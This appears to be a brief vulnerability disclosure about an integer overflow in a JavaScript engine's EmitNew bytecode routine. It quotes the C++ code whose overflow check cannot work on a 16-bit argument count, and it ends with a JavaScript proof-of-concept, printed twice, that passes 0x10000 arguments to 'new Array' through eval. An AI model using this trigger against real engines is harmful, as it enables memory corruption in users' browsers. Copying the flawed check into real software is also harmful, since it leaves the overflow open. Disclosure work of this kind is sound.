The bytecode generator uses the âEmitNewâ function to handle new operators.
Hereâs the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount;
argCount++; // include "this"
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}
âJs::ArgSlot
â is a 16 bit unsigned integer type. And âargCount
â is of the type âJs::ArgSlot
â. So âif (argCount != (Js::ArgSlot)argCount)
â has no point. It canât prevent the integer overflow at all.
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');